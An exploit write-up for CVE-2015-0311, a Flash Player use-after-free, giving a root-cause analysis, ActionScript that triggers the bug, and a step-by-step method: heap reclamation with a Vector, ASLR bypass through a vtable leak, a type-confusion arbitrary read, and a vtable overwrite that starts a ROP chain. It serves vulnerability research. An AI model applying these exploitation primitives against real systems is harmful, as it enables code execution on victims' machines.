Exploiting CVE-2015-0311: A Use-After-Free in Adobe Flash Player

At the end of January, Adobe published the security bulletin APSA15-01 for Flash Player, which fixes a critical use-after-free vulnerability affecting Adobe Flash Player 16.0.0.287 and earlier versions. This vulnerability, identified as CVE-2015-0311, allows attackers to execute arbitrary code on vulnerable machines by enticing unsuspecting users to visit a website serving a specially crafted SWF Flash file. The vulnerability was first discovered as a zero-day being actively exploited in the wild as part of the Angler Exploit Kit. Although the exploit code was highly obfuscated using the SecureSWF obfuscation tool, malware samples taking advantage of this vulnerability became publicly available.

Vulnerability overview

When trying to decompress the data in a ByteArray previously compressed with zlib from ActionScript code, the underlying ActionScript Virtual Machine (AVM) will handle this operation in the ByteArray::UncompressViaZlibVariant method. This method makes use of the ByteArray::Grower class in order to dynamically grow the destination buffer for the decompressed data. After a successful growth of the destination buffer, the destructor of the Grower class will notify all the subscribers of the compressed ByteArray that they must use the newly-grown buffer.

One example of a subscriber for a ByteArray is the global ApplicationDomain.currentDomain.domainMemory property, which can be set to hold a global reference to a given ByteArray. The purpose of ApplicationDomain.currentDomain.domainMemory is to provide fast read-and-write operations over the actual data of a ByteArray by using low-level AVM instructions from the avm2.intrinsics.memory package, like li8/si8, li16/si16, li32/si32, etc.

A problem arises when the inflate() function of the zlib library fails because the data in the ByteArray is not valid zlib-compressed data. In that case, the ByteArray::UncompressViaZlibVariant() method will do a rollback, by freeing the grown buffer and restoring the original data of the ByteArray. However, it does NOT notify the subscriber (ApplicationDomain.currentDomain.domainMemory) that the grown buffer has been freed, so ApplicationDomain.currentDomain.domainMemory will keep a dangling reference to the freed buffer.

Root cause analysis

Let's dig into the source code of the ActionScript Virtual Machine and see what happens under the hood when we call the uncompress() method of a ByteArray object from ActionScript code. When we try to decompress the data of a ByteArray, the ByteArray::Uncompress() method of the AVM (defined in core/ByteArrayGlue.cpp) calls a decompression function according to the compression algorithm that was used to compress the data. We are going to focus on the zlib case.

    void ByteArray::Uncompress(CompressionAlgorithm algorithm)
    {
        switch (algorithm) {
        case k_lzma:
            UncompressViaLzma();
            break;
        case k_zlib:
        default:
            // zlib is also the fallback for any other algorithm value
            UncompressViaZlibVariant(algorithm);
            break;
        }
    }

ByteArray::UncompressViaZlibVariant() calls the inflate() function from the zlib library within a loop in order to decompress the ByteArray data in chunks, as shown in the code snippet below:

    void ByteArray::UncompressViaZlibVariant(CompressionAlgorithm algorithm)
     {
             [...]
             while (error == Z_OK)
             {
                 stream.next_out = scratch;
                 stream.avail_out = kScratchSize;
                 error = inflate(&stream, Z_NO_FLUSH);
                 Write(scratch, kScratchSize - stream.avail_out);
             }
 
             inflateEnd(&stream);
  [...]

After calling inflate() from the zlib library, the Write() method of the ByteArray class is called in order to copy the decompressed chunk to the destination buffer:

    void ByteArray::Write(const void* buffer, uint32_t count)
     {
         if (count > UINT32_T_MAX - m_position) // Do not rearrange, guards against 64-bit overflow
             ThrowMemoryError();
 
         uint32_t writeEnd = m_position + count;
         
         Grower grower(this, writeEnd);
         grower.EnsureWritableCapacity();
         
         move_or_copy(m_buffer->array + m_position, buffer, count);
         m_position += count;
         if (m_buffer->length < m_position)
             m_buffer->length = m_position;
     }

As you can see, that method creates an instance of the Grower class and calls its EnsureWritableCapacity() method in order to grow the destination buffer. The scope of this Grower instance is local to the ByteArray::Write() method, so when the method returns, the destructor of the Grower class is implicitly invoked. Here's part of the code of the Grower class destructor. It calls the NotifySubscribers() method of the ByteArray class:

    ByteArray::Grower::~Grower()
    {
        if (m_oldArray != m_owner->m_buffer->array || m_oldLength != m_owner->m_buffer->length)
        {
            m_owner->NotifySubscribers();
        }
        [...]

ByteArray::NotifySubscribers() loops through all the subscribers of the ByteArray, calling their notifyGlobalMemoryChanged() method in order to inform them of the address and the size of the newly grown buffer:

    void ByteArray::NotifySubscribers()
    {
        for (uint32_t i = 0, n = m_subscribers.length(); i < n; ++i) {
            AvmAssert(m_buffer->length >= DomainEnv::GLOBAL_MEMORY_MIN_SIZE);

            DomainEnv* subscriber = m_subscribers.get(i);
            if (subscriber)
            {
                subscriber->notifyGlobalMemoryChanged(m_buffer->array, m_buffer->length);
            }
            else
            {
                // Domain went away? remove link
                m_subscribers.removeAt(i);
                --i;
            }
        }
    }

Finally, the DomainEnv::notifyGlobalMemoryChanged() method will update the address and the size of the global memory. This is the method that actually modifies the base address and size of ApplicationDomain.currentDomain.domainMemory:

    // memory changed so go through and update all reference to both the base
    // and the size of the global memory
    void DomainEnv::notifyGlobalMemoryChanged(uint8_t* newBase, uint32_t newSize)
    {
        AvmAssert(newBase != NULL); // real base address
        AvmAssert(newSize >= GLOBAL_MEMORY_MIN_SIZE); // big enough

        m_globalMemoryBase = newBase;
        m_globalMemorySize = (newSize > 0x7fffffff) ? 0x7fffffff : newSize;
        TELEMETRY_UINT32(toplevel()->core()->getTelemetry(), ".mem.bytearray.alchemy",m_globalMemorySize/1024);
    }

At the end of this call chain, we are back in the "inflate() and Write()" loop within the ByteArray::UncompressViaZlibVariant() method. If one of the calls to inflate() within the loop returns a value other than Z_OK (0), the loop is exited, and a check is performed to determine whether the data was fully decompressed. If something went wrong, a rollback is performed: the new buffer is freed by calling TellGcDeleteBufferMemory() / mmfx_delete_array() and the original data of the ByteArray is restored, as shown below:

    [...]
    if (error == Z_STREAM_END)
    {
        // everything is cool
        [...]
    else
    {
        // When we error:

        // 1) free the new buffer
        TellGcDeleteBufferMemory(m_buffer->array, m_buffer->capacity);
        mmfx_delete_array(m_buffer->array);

        if (cShared) {
            m_buffer = origBuffer;
        }

        // 2) put the original data back.
        m_buffer->array = origData;
        m_buffer->length = origLen;
        m_buffer->capacity = origCap;
        m_position = origPos;
        SetCopyOnWriteOwner(origCopyOnWriteOwner);
        origBuffer = NULL; // release ref before throwing
        toplevel()->throwIOError(kCompressedDataError);
    }

But note that no one notifies the subscribers that the new buffer has been freed! So ApplicationDomain.currentDomain.domainMemory will keep a reference to that buffer even after it has been freed because decompression failed. We can later dereference that dangling pointer, so this is a use-after-free vulnerability.
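The missing notification can be modeled outside of the AVM. The following is a minimal sketch, not the AVM code: ToySubscriber, ToyByteArray and subscriberIsStale are hypothetical names, the buffer grows exactly once before the simulated failure, and the subscriber stores addresses as integers so the stale value is only compared, never dereferenced. The notifyOnRollback flag illustrates one plausible way to close the gap; it is not a description of Adobe's actual patch.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <memory>
#include <utility>

// Hypothetical stand-in for DomainEnv: it only remembers the last base address
// and size it was told about, stored as integers so they are never dereferenced.
struct ToySubscriber {
    std::uintptr_t base = 0;
    std::size_t size = 0;
    void notifyGlobalMemoryChanged(std::uintptr_t newBase, std::size_t newSize) {
        base = newBase;
        size = newSize;
    }
};

// Hypothetical stand-in for ByteArray with a single subscriber.
class ToyByteArray {
public:
    explicit ToyByteArray(std::size_t length)
        : buffer_(new std::uint8_t[length]()), length_(length) {
        assert(length > 0);
    }

    void subscribe(ToySubscriber* subscriber) {
        subscriber_ = subscriber;
        notifySubscriber();
    }

    std::uintptr_t address() const {
        return reinterpret_cast<std::uintptr_t>(buffer_.get());
    }

    // Models a decompression that grows the buffer once and then fails.
    void failedUncompress(bool notifyOnRollback) {
        std::unique_ptr<std::uint8_t[]> original = std::move(buffer_);
        const std::size_t originalLength = length_;

        // Growth step: a new buffer is allocated and the subscriber is told
        // about it (the role played by the Grower destructor).
        length_ = originalLength * 2;
        buffer_.reset(new std::uint8_t[length_]());
        notifySubscriber();

        // Rollback step: moving the original back frees the grown buffer.
        buffer_ = std::move(original);
        length_ = originalLength;
        if (notifyOnRollback) {
            notifySubscriber();  // the call the vulnerable code path lacks
        }
    }

private:
    void notifySubscriber() {
        if (subscriber_ != nullptr) {
            subscriber_->notifyGlobalMemoryChanged(address(), length_);
        }
    }

    std::unique_ptr<std::uint8_t[]> buffer_;
    std::size_t length_;
    ToySubscriber* subscriber_ = nullptr;
};

// True when the subscriber's cached base no longer matches the live buffer.
bool subscriberIsStale(const ToyByteArray& array, const ToySubscriber& subscriber) {
    return subscriber.base != array.address();
}
```

Calling failedUncompress(false) leaves the subscriber holding the address of the grown buffer that was just released, which is the dangling reference described above; calling failedUncompress(true) brings the subscriber back in sync with the restored buffer.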

Triggering the Use-After-Free

We can reproduce this dangling pointer condition with the following steps: fill a ByteArray with some data, compress it with zlib, overwrite the compressed data with junk starting at offset 0x200, assign the ByteArray to ApplicationDomain.currentDomain.domainMemory in order to create a subscriber for it, and finally call the uncompress() method on the ByteArray.

But why overwrite the compressed data starting at offset 0x200? Leaving some valid compressed data at the beginning of the ByteArray makes the first call to inflate() succeed; this way the ByteArray::Write() method creates an instance of the Grower class, which grows the destination buffer for the decompressed data and notifies the subscribers to use the newly grown buffer. In the second iteration of the "inflate() and Write()" loop, inflate() tries to decompress junk data and fails. ByteArray::UncompressViaZlibVariant() then performs the rollback, freeing the new buffer without notifying the subscribers of the ByteArray, hence leaving a dangling pointer.

The following ActionScript code snippet reproduces the vulnerability, leaving ApplicationDomain.currentDomain.domainMemory referencing a freed buffer:

    /* Assumption: count and pos are plain counters; the original snippet does not
       show their declarations. pos starts at 0x200 to match the write position. */
    var count:uint = 0;
    var pos:uint = 0x200;

    this.byte_array = new ByteArray();
    this.byte_array.endian = Endian.LITTLE_ENDIAN;
    this.byte_array.position = 0;

    /* Initialize the ByteArray with some data */
    while (count < 0x2000 / 4){
        this.byte_array.writeUnsignedInt(0xfeedface + count);
        count++;
    }

    /* Compress it with zlib */
    this.byte_array.compress();

    /* Overwrite the compressed data with junk, starting at offset 0x200 */
    this.byte_array.position = 0x200;
    while (pos < this.byte_array.length){
        this.byte_array.writeByte(pos);
        pos++;
    }

    /* Create a subscriber for that ByteArray */
    ApplicationDomain.currentDomain.domainMemory = this.byte_array;

    /* Trigger the bug! ByteArray::UncompressViaZlibVariant will leave ApplicationDomain.currentDomain.domainMemory
       pointing to a buffer that is freed when the decompression fails. */
    try{
        this.byte_array.uncompress();
    } catch(error:Error){
    }

So at this point we have ApplicationDomain.currentDomain.domainMemory referencing freed memory. ApplicationDomain.currentDomain.domainMemory has type ByteArray. If we try to use its high-level methods, they seem to operate on the legitimate ByteArray with the corrupted compressed data. Let's go back to the source code of the ActionScript Virtual Machine and recall how the DomainEnv::notifyGlobalMemoryChanged() method updates the address and the size of the global memory:

 m_globalMemoryBase = newBase;
  m_globalMemorySize = (newSize > 0x7fffffff) ? 0x7fffffff : newSize;

m_globalMemoryBase (the dangling pointer itself) and m_globalMemorySize are members of the DomainEnv class (core/DomainEnv.h). These members are accessed through these getter methods:

 REALLY_INLINE uint8_t* globalMemoryBase() const { return m_globalMemoryBase; }
  REALLY_INLINE uint32_t globalMemorySize() const { return m_globalMemorySize; }

If we look for references to these getter methods in the AVM source code, we find them in the core/Interpreter.cpp file:

    #define MOPS_LOAD_INT(addr, type, call, result) \
        MOPS_RANGE_CHECK(addr, type) \
        union { const uint8_t* p8; const type* p; }; \
        p8 = envDomain->globalMemoryBase() + (addr); \
        result = *p;

    #define MOPS_STORE_INT(addr, type, call, value) \
        MOPS_RANGE_CHECK(addr, type) \
        union { uint8_t* p8; type* p; }; \
        p8 = envDomain->globalMemoryBase() + (addr); \
        *p = (type)(value);

And those macros are used in the same core/Interpreter.cpp file:

    INSTR(li32) {
        i1 = AvmCore::integer(sp[0]); // i1 = addr
        MOPS_LOAD_INT(i1, int32_t, li32, i32l); // i32l = result
        sp[0] = core->intToAtom(i32l);
        NEXT;
    }
    [...]
    INSTR(si32) {
        i32l = AvmCore::integer(sp[-1]); // i32l = value
        i1 = AvmCore::integer(sp[0]); // i1 = addr
        MOPS_STORE_INT(i1, uint32_t, si32, i32l);
        sp -= 2;
        NEXT;
    }

So that's it! In order to dereference the dangling pointer we need to use the low-level AVM instructions from the avm2.intrinsics.memory package, like li8/si8, li16/si16, li32/si32, etc. These instructions, in conjunction with ApplicationDomain.currentDomain.domainMemory, provide fast read-and-write operations over the underlying raw buffer that contains the actual data of a ByteArray, skipping the overhead of using the high-level methods of the ByteArray class. The li8/si8, li16/si16, li32/si32 instructions operate implicitly on ApplicationDomain.currentDomain.domainMemory, as shown in the ActionScript snippet below:

 /* Read a 32-bit integer from m_globalMemoryBase + 0x20 */
  var some_value:uint = li32(0x20);
 
  /* Overwrite the 32-bit integer at m_globalMemoryBase + 0x20 with 0xffffffff */
  si32(0xffffffff, 0x20);
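The body of MOPS_RANGE_CHECK is not shown in the excerpts above. As a rough sketch, assuming it validates the requested offset only against the cached size returned by globalMemorySize(), the check could look like the function below. isAccessInRange is a hypothetical name, not an AVM function. The point it illustrates is that such a check cannot catch the bug: after the rollback the cached size still describes the freed buffer, so offsets inside that old range are accepted.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical sketch of a range check for an access of accessSize bytes at
// offset addr, validated only against the cached global memory size.
bool isAccessInRange(std::uint32_t addr, std::uint32_t accessSize, std::uint32_t cachedSize) {
    // Written as two comparisons so that addr + accessSize cannot wrap around.
    return accessSize <= cachedSize && addr <= cachedSize - accessSize;
}
```

With the cached size of 0x1c32 observed later in this post, a 4-byte access at offset 0x20 passes this kind of check even though the memory behind it has already been freed.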

Exploitation

In order to exploit this vulnerability, once you are debugging a vulnerable version of the Adobe Flash Player within your web browser, you may want to put a breakpoint at the beginning of the "inflate() and Write()" loop:

The first time the breakpoint is hit, follow the call to ByteArray::Write() all the way down to the DomainEnv::notifyGlobalMemoryChanged() method, in order to watch how ApplicationDomain.currentDomain.domainMemory is updated. This is that method in the Flash OCX binary file:

[EDX + 0x14] will hold the address of the new buffer, while [EDX + 0x18] will hold the size of the new buffer. In my testing environment, ApplicationDomain.currentDomain.domainMemory was updated with a buffer address of 0x0a98c000 and a buffer length of 0x1c32.

The next call to inflate() will fail with error code 0xfffffffb, so execution flow goes to the routine that performs the rollback (the one named cleanup_on_uncompress_error here):

Stepping into this function we can see how it frees the buffer by calling TellGcDeleteBufferMemory() on it:

Note that the arguments for TellGcDeleteBufferMemory() are 0x0a98c000 (buffer address) and 0x200f. 0x200f is the buffer capacity here, which is different from the buffer length (0x1C32, as shown in a screenshot above). From the core/ByteArrayGlue.h file:

        class Buffer : public FixedHeapRCObject
        {
        public:
            virtual void destroy();
            virtual ~Buffer();
            uint8_t* array;
            uint32_t capacity;
            uint32_t length;
        };

Buffer.capacity is the maximum number of bytes that a Buffer can hold (0x200f in this case), while Buffer.length is the number of bytes actually used (0x1C32), hence the difference. Right after calling TellGcDeleteBufferMemory() it calls mmfx_delete_array() to finish freeing the buffer.
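As a side note on the debugging session above, the value 0xfffffffb returned by the failing inflate() call is easier to interpret as a signed 32-bit integer: it is -5, which zlib.h defines as Z_BUF_ERROR. The small sketch below does that conversion and maps the result to the constant names from zlib.h; toSigned32 and zlibReturnCodeName are illustrative helper names, not part of zlib or the AVM.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Reinterprets a 32-bit register value as a signed integer without relying on
// implementation-defined narrowing conversions.
std::int32_t toSigned32(std::uint32_t raw) {
    if (raw <= 0x7fffffffu) {
        return static_cast<std::int32_t>(raw);
    }
    const std::uint32_t inverted = static_cast<std::uint32_t>(~raw);
    return -static_cast<std::int32_t>(inverted) - 1;
}

// Maps an inflate() return value to the constant name used in zlib.h.
std::string zlibReturnCodeName(std::int32_t code) {
    switch (code) {
        case 2:  return "Z_NEED_DICT";
        case 1:  return "Z_STREAM_END";
        case 0:  return "Z_OK";
        case -1: return "Z_ERRNO";
        case -2: return "Z_STREAM_ERROR";
        case -3: return "Z_DATA_ERROR";
        case -4: return "Z_MEM_ERROR";
        case -5: return "Z_BUF_ERROR";
        case -6: return "Z_VERSION_ERROR";
        default: return "unknown";
    }
}
```

Any value other than Z_OK ends the loop, and any value other than Z_STREAM_END sends execution to the rollback path.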

So now that the buffer is freed, we want to allocate some interesting object in the memory "hole" left by that buffer. I did it by following the same method used in the malware sample, that is, creating a new placeholder ByteArray with size 0x2000, then freeing it by calling its clear() method, and finally creating a Vector.<Object>(510 * 3) object. That means that at this point we have ApplicationDomain.currentDomain.domainMemory (which should be referencing the raw buffer that contains the actual data of a ByteArray) pointing to the very beginning of a Vector object! Since we can perform read-and-write operations on the memory pointed to by ApplicationDomain.currentDomain.domainMemory by using AVM instructions like li32/si32, we can read and modify the Vector object at will, including its metadata! The following diagram illustrates the expected state versus the actual state after triggering the bug and allocating a Vector object in the memory hole left by the freed buffer:

Tampering with the Vector

The memory layout of the Vector object looks like this:

$ ==> <Vector>                  00010C00
$+4                             00001FE0
$+8                             08238000
$+C                             082FA248
$+10                            0793C000
$+14                            09B8E018    <pointer to the_vector + 0x18 - useful if you need to obtain the address of the_vector>
$+18                            00000010
$+1C                            00000000
$+20 .vtable                    61199418    OFFSET <Flash32_.Vector_vtable>  -> Overwrite it to hijack the execution flow
$+24 .length                    000005FA    -> Overwrite it with 0xffffffff so you can read/write from/to any memory address
$+28 .elements[]                07A86BA1    the_vector[0]    
$+2C                            07A86BA1    the_vector[1]
$+30                            07A86BA1    the_vector[2] 
...                             xxxxxxxx    the_vector[n]

By doing li32(0x20) we can read the dword stored at offset 0x20 of the Vector object, which is its vtable; knowing the address of the vtable is enough to determine the base address of the Flash module, allowing us to bypass ASLR. By doing si32(0xffffffff, 0x24) we can overwrite the dword stored at offset 0x24 of the Vector object, which is its length. Setting this new length would allow us to read/write from/to any memory address within the address space of the browser process, although I didn't need to modify the Vector length in order to exploit this vulnerability on Windows 7 SP1.

Then we build our ROP chain as a ByteArray, and we store it as the first element of the Vector (no metadata is overwritten here). This ByteArray object with our ROP chain is stored as a tagged pointer. But what's a tagged pointer? Flash adds information about object pointers in the 3 least significant bits, as described below (taken from Haifei Li's presentation from CanSecWest 2011):

    Untagged    = 000 (0)
    Object      = 001 (1)
    String      = 010 (2)
    Namespace   = 011 (3)
    "undefined" = 100 (4)
    Boolean     = 101 (5)
    Integer     = 110 (6)
    Number      = 111 (7)
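The tag arithmetic from the table above can be written down in a few lines. This is only a sketch of the bit manipulation for 32-bit values; AtomTag, tagOf, untag and withTag are illustrative names rather than AVM identifiers. The static_assert lines use the element value 0x07A86BA1 from the Vector dump shown earlier.

```cpp
#include <cassert>
#include <cstdint>

// The three least significant bits of a 32-bit value carry the type tag.
constexpr std::uint32_t kTagMask = 0x7u;

enum class AtomTag : std::uint32_t {
    Untagged = 0, Object = 1, String = 2, Namespace = 3,
    Undefined = 4, Boolean = 5, Integer = 6, Number = 7
};

// Extracts the type tag from a tagged value.
constexpr AtomTag tagOf(std::uint32_t atom) {
    return static_cast<AtomTag>(atom & kTagMask);
}

// Clears the tag bits, leaving the 8-byte-aligned address.
constexpr std::uint32_t untag(std::uint32_t atom) {
    return atom & ~kTagMask;  // same as atom & 0xfffffff8
}

// Replaces whatever tag is present with the given one.
constexpr std::uint32_t withTag(std::uint32_t address, AtomTag tag) {
    return untag(address) | static_cast<std::uint32_t>(tag);
}

// the_vector[0] in the dump above is 0x07A86BA1: an Object at 0x07A86BA0.
static_assert(tagOf(0x07A86BA1u) == AtomTag::Object, "low bits 001 mean Object");
static_assert(untag(0x07A86BA1u) == 0x07A86BA0u, "untagging clears the low 3 bits");
```

Because the tag occupies the low three bits, the untagged address is always a multiple of 8.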

So now we can leak the address of our ROP chain ByteArray object by doing li32(0x28) (that is, doing a raw read of the first element of the Vector) and then untagging it by clearing its 3 least significant bits with an "address & 0xfffffff8" bitwise operation. Having leaked the pointer to the ROP chain ByteArray object, we want to read the dword stored at offset 0x40 of the ByteArray object, which is a pointer to a ByteArray::Buffer object. This is the memory layout of a ByteArray object for reference:

$ ==> <ByteArray>               71078F10  OFFSET <Flash32_.ByteArray_vtable>
$+4                             00000002
$+8                             069CFDD0
$+C                             0697E628
$+10                            06831360
$+14                            00000040
$+18                            71078EB8  Flash32_.71078EB8
$+1C                            71078EC0  Flash32_.71078EC0
$+20                            71078EB4  Flash32_.71078EB4
$+24                            710BD534  Flash32_.710BD534
$+28                            06603080
$+2C                            06432000
$+30                            0688EFB8
$+34                            00000000
$+38                            00000000
$+3C                            7108ACC8  Flash32_.7108ACC8
$+40                            0686D5D8  <pointer to ByteArray::Buffer>
$+44                            00000000

In order to read the dword stored at offset 0x40 of the ByteArray object I decided to use a technique explained by Nicolas Joly from Vupen, which consists of modifying (tagging) a pointer so it is interpreted as a pointer to a Number (IEEE-754 double precision) object, thus creating a type confusion that will provide us with a primitive to read 8 bytes from an arbitrary address. First we tag the address we want to read from as a pointer to a Number object (OR'ing the address with 7 - see the tags table above). That's how we create the confusion. Then we store this fake pointer-to-Number-object in the elements[] array of the Vector by doing si32(fake_number_object, 0x2C). After that we grab that fake Number object (this.the_vector[1] in the code below) and write it to an auxiliary ByteArray; this way the 8 bytes stored at the arbitrary address we want to read from are stored in the auxiliary ByteArray.

            obj = this.the_vector[1];
            z = new Number(obj);

            var b:ByteArray = new ByteArray();
            b.endian = Endian.LITTLE_ENDIAN;
            b.writeDouble(z);

            /* If pointer is aligned to 8, then we read the first dword */
            if ((pointer & 7) == 0){
                result = b[3]*0x1000000 + b[2]*0x10000 + b[1]*0x100 + b[0];
            }
            /* else we read the second dword */
            else{
                result = b[7]*0x1000000 + b[6]*0x10000 + b[5]*0x100 + b[4];
            }
            return result;
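The dword selection at the end of the snippet above follows from the tagging scheme: since the three low bits of the fake pointer are tag bits, the 8 bytes of the fake Number are taken from the address rounded down to a multiple of 8. If the address we want is 8-byte aligned, the wanted dword is the first half of those 8 bytes; otherwise (assuming the address is at least 4-byte aligned) it is the second half. The sketch below reproduces only that byte selection, under the assumption that the 8 bytes arrive exactly as they sit in little-endian memory; littleEndianDword and selectDword are hypothetical helper names.

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assembles a 32-bit little-endian value from 4 bytes starting at offset.
std::uint32_t littleEndianDword(const std::array<std::uint8_t, 8>& bytes, std::size_t offset) {
    assert(offset + 4 <= bytes.size());
    return static_cast<std::uint32_t>(bytes[offset]) |
           (static_cast<std::uint32_t>(bytes[offset + 1]) << 8) |
           (static_cast<std::uint32_t>(bytes[offset + 2]) << 16) |
           (static_cast<std::uint32_t>(bytes[offset + 3]) << 24);
}

// Picks the dword that corresponds to pointer out of the 8 bytes read from
// the enclosing 8-byte-aligned block (pointer is assumed 4-byte aligned).
std::uint32_t selectDword(const std::array<std::uint8_t, 8>& bytes, std::uint32_t pointer) {
    const std::size_t offset = ((pointer & 7u) == 0) ? 0 : 4;
    return littleEndianDword(bytes, offset);
}
```

For example, with the first 8 bytes of the ByteArray::Buffer object shown below (5C 94 D1 63 03 00 00 00), an 8-byte-aligned pointer selects 0x63D1945C, while the same address plus 4 selects 0x00000003.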

We use this primitive to read the dword stored at offset 0x40 of the ByteArray object, which is a pointer to a ByteArray::Buffer object as mentioned before, and then we use the read primitive once more to read the dword stored at offset 0x8 of the ByteArray::Buffer object, which is a pointer to the raw data of our ROP chain ByteArray. Here is the memory layout of a ByteArray::Buffer object for reference:

$==> <Buffer>                 63D1945C  OFFSET <Flash32_.Buffer_vtable>
$+4                           00000003
$+8  .array                   06BC5000  <pointer to the raw data of the ByteArray>
$+C  .capacity                0000200F
$+10 .length                  00001C32

This way we have obtained the address of our ROP chain (0x06BC5000 in this example); now we just need to overwrite the vtable of the Vector object with the address of our ROP chain by doing si32(address_of_rop_chain, 0x20), and then call the toString() method of the Vector object, so the overwritten vtable is dereferenced to call a function pointer, thus hijacking the execution flow in order to start our ROP and ultimately execute arbitrary code:

    new Number(this.the_vector.toString());

Conclusion

The use-after-free vulnerability analyzed in this post can be leveraged to read and modify arbitrary memory in the address space of the browser process, allowing the attacker to bypass protections provided by the operating system like ASLR and DEP, ultimately leading to the execution of arbitrary code. However, you should note that the exploitation process described in this blog post applies to Windows 7 SP1, but it will not work on Windows 8.1 Update 3 (released November 2014).

Why is that? Well, in Windows 8.1 Update 3 Microsoft introduced a new exploit mitigation technology called Control Flow Guard (CFG). CFG injects a check before every indirect call in the code in order to verify that the destination address of that call is one of the locations identified as "safe" at compile time. If that check fails at runtime, the program detects an attempt to subvert the normal execution flow and exits immediately. It turns out that the Flash version that is integrated into Windows 8.1 Update 3 is compiled with Control Flow Guard enabled, so in the last exploitation step, when we overwrite the Vector vtable and call the toString() method of the Vector object in order to modify the execution flow, the CFG check function will detect our fake vtable and terminate the process immediately, thus preventing our exploitation attempt.

That means that exploiting this Flash vulnerability on Windows 8.1 Update 3 targets introduces a new hurdle: bypassing the CFG protection. Spoiler alert: we did manage to bypass CFG in order to successfully exploit this Flash vulnerability on Windows 8.1 Update 3. So stay tuned for a new blog post with a detailed explanation of how we did it!